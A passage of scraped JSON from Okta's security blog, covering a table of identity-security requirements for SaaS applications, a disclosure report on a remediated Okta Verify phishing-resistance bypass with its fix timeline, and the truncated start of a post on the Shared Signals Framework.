Statements\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A more expansive list of requirements for SaaS applications is provided below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Requirement\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standard\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Requirement Statement\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Support\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Single Sign-On\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OIDC \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"(\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://openid.net/specs/openid-connect-core-1_0.html#\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OpenID Connect\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must support Single Sign-On using a protocol that can protect privileged operations in the application with phishing-resistant re-authentication provided by the Identity Provider.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Modern, best of breed applications using the Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Customer Identity Cloud \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"(Auth0) and the Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Workforce Identity Cloud \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"support OIDC.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Both platforms support transactional MFA.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Passkeys\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FIDO2 WebAuthn\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Break Glass Accounts (non-Federated accounts) in enterprise SaaS applications must be protected by phishing-resistant factors to thwart common credential-based attacks. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Passkeys\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" are supported as the primary authenticator in both the Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Customer Identity Cloud \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"(Auth0) and the Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Workforce Identity Cloud \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Provisioning and Deprovisioning\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/html/draft-ietf-scim-core-schema\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SCIM\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" (System for Cross- domain Identity Management)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must support industry standard approaches to the automated provisioning and deprovisioning of users.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Lifecycle Management\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" uses SCIM to automate user lifecycle management. Applications built on the Okta Customer Identity Cloud (Auth0) can be managed by any SCIM compatible client such as the Okta Workforce Identity Cloud\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Role and Entitlement management\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/html/draft-ietf-scim-roles-entitlements-00\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SCIM\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Roles and Entitlements Extension\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must support centralized identity governance mechanisms that ensure users are only provided the minimum permissions required for their role at any given time.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Governance\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" can manage user entitlements within the world’s top SaaS applications. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Application Logs \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"REST APIs\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must offer programmatic access to logs that can be streamed in real time.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Logs should capture all security-relevant events. Events should be well documented and presented in a structured, industry-standard format. All distinct fields should be able to be programmatically parsed.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Log Streaming \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"offers access to Okta log events in close to real-time for both the Okta Customer Identity Cloud (Auth0) and Workforce Identity Cloud \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dynamic Access Management \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://openid.net/wg/sharedsignals/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Continuous Access Evaluation Profile (CAEP)\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must be able to transmit and subscribe to risk signals using open, industry standard frameworks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At minimum, applications need to publish and subscribe to the following events:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Session Revoked\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Change\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Identity Threat Protection\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" can publish and subscribe to CAEP-compliant events. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Universal Logout\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/html/draft-parecki-oauth-global-token-revocation-01\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Global Token Revocation\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must publish a standard interface for revoking access to an application, including OAuth tokens.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our roadmap supports Universal Logout across all Okta applications.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Access Standards\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/draft-ietf-oauth-v2-1/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OAuth 2.1\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications should implement OAuth 2.1 based access to their APIs \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OAuth is the industry standard for secure API access and supports both user delegated and non-human service based access mechanisms.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sender Constrained Tokens\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/dpop/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Demonstrating Proof-of-Possession (DPoP)\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications must require cryptographic proof that a client presenting an access token was the client authorized to do so (demonstrating Proof-of-Possession).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Okta Workforce Identity Cloud supports \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"DPoP\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" and requires it by default for new API Service Integrations.\\n\\nOkta’s roadmap includes plans to embed DPoP for new B2B SaaS apps in the Okta Customer Identity Cloud (Auth0).\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Best Practices\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://oauth.net/2/oauth-best-practice/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OAuth2.0 Security BCP\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\\n\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://oauth.net/2/browser-based-apps/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Browser-based Apps BCP\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\\n\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://oauth.net/2/native-apps/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Native and Mobile Apps BCP\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.rfc-editor.org/rfc/rfc7523.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"JWT Client Authentication and Authorization Grants\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SaaS applications should support agreed Best Current Practices agreed by IETF.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta personnel are contributors to many of these Best Current Practice materials.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is helping to incubate several other identity standards that were deliberately omitted from this list, given that they are not yet actionable by security teams. The emerging work in W3C around \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/WICG/dbsc/blob/main/README.md\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device Bound Session Credentials\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is most interesting, as it brings proof-of-possession properties to browser-based session cookies; which is the final piece in the puzzle for protecting modern apps.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T20:54:14.642Z","secAuthor":[{"id":"49d070bc-d763-5c0e-9734-5ec90fcfcd0d","bio":{"bio":"Karl McGuinness is Chief Product Architect at Okta where he is responsible for product strategy, architecture, and identity standards. He has over 20 years of experience in the identity industry building and scaling market leading products and infrastructure. Karl is actively involved with the identity community developing and adopting technical standards that provide the foundation for the Okta Identity Cloud.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6fixoIccP6y6XyYM36hVRj/e922b686e242a3f68bb809567d4863c9/karl-mcguiness-speaker.jpg"},"name":"Karl McGuinness","jobTitle":"Chief Product Architect, Okta","slug":"karl-mcguinness","node_locale":"en"}]},{"slug":"/articles/2024/04/okta-verify-vulnerability-disclosure-report-response-and-remediation","id":"aab26466-19e0-587b-83cb-8765e6c59b40","title":" Okta Verify Vulnerability Disclosure Report - Response and Remediation","date":"2024-04-23T22:59:10+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has confirmed and remediated a reported Okta Verify vulnerability. No action is needed by customers, and outside of the original proof of concept Okta did not identify any evidence of attempts to exploit this vulnerability. As part of our recent Okta Secure Identity Commitment, we are communicating this remediation to customers in the spirit of transparency.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Response\",\"marks\":[{\"type\":\"bold\"},{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On April 5th, Okta received a report from a researcher at Persistent Security of a potential vulnerability in Okta Verify that detailed bypassing phishing resistance checks. Upon receipt, we initiated our vulnerability disclosure process, and upon further investigation, it was discovered that an adversary could bypass the phishing-resistant property of Okta Verify FastPass given certain parameters.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On April 8th, Okta’s Engineering team successfully identified the root cause within Okta’s backend code and created a mitigation plan. It’s important to note that the root cause did not reside within the Okta Verify application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Vulnerability\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The details of the vulnerability are as follows.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In a phishing-resistant challenge involving a CUSTOM_URI and SSO Extension, if the user:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"only offers user verification or an approved consent prompt and additionally\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"the origin header is missing, the logic returns “true”, as the authorization intention was to approve transactions only if a user-approved consent accompanied the missing origin header.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, we incorrectly assumed that the presence of a missing origin header and an approved user verification (or approved consent prompt) was equal to a verified phishing resistance. To correct this, we have implemented an additional verification step to confirm that a valid origin header is present before then confirming phishing resistance. Going forward, this measure ensures that the transaction is valid and secure.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On April 9th, the fix was deployed to a development cell, and validated as effective. We then applied a hotfix to a production cell, and following an additional successful validation, the fix was rolled out to all remaining production cells on April 10th and to staging cells on April 11th. This hotfix remediated the vulnerability, with no customer follow-up action needed.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That said, this reported vulnerability does highlight the importance of comprehensive threat models, as well as the role that manual testing can still play in developing secure components. Okta would like to thank Nikos Laleas and Giuseppe Trotta from the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.persistent-security.net/about-us\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Persistent Security Industries\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (PSI) Team for bringing this exploit to our attention, as well as their commitment to responsible disclosure.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Timeline\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 5, 2024 - Persistent Security contacts Okta with report\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 6, 2024 - Okta Security validates the findings\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 8, 2024 - Okta discovers root cause\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 9, 2024 - Okta deploys fix to development environment\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 9, 2024 - Okta validates fix\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 10, 2024 - Fix deployed to Production\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apr 11, 2024 - Fix deployed to Preview\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T20:37:12.164Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2024/04/why-cyber-heroes-need-zero-trust-caep","id":"49fbd3a8-0382-54b2-a8e4-ddc111315da0","title":"Why Cyber-heroes need a Zero Trust CAEP!","date":"2024-04-23T23:12:34+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the modern digital landscape, where threats evolve and organizational perimeters extend into the cloud, maintaining a strong security posture requires more than static defense mechanisms. This is where the Continuous Access Evaluation Profile (CAEP) and the Shared Signals Framework (SSF) come into play.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At the recent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.gartner.com/en/conferences/emea/identity-access-management-uk\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Gartner Identity & Access Management Summit in London\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", Apoorva Deshpande, Okta Engineering Lead, along with other OpenID Foundation SSF Working Group members, demonstrated how these signals can be used as part of a Zero Trust approach to create policies in Okta to detect and prevent threats across technology platforms and data silos.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3MgaaQeTOtjG7mlyF5hTrG\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Wait, doesn’t my SIEM already do this?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The OpenID Foundation Shared Signals Framework (SSF) and Security Information and Event Management (SIEM) systems play very different roles in an organization's cybersecurity strategy.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Information and Event Management (SIEM) systems play a crucial role in helping analysts detect, analyze and respond to cybersecurity threats. Analysts stream network, application and device logs to a SIEM for aggregation, correlation and alerting on known suspicious activity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Shared Signals Framework is a method for transmitting, receiving and aggregating risk signals between applications, creating opportunities for automated policy-based actions. SSF-based CAEP events specifically 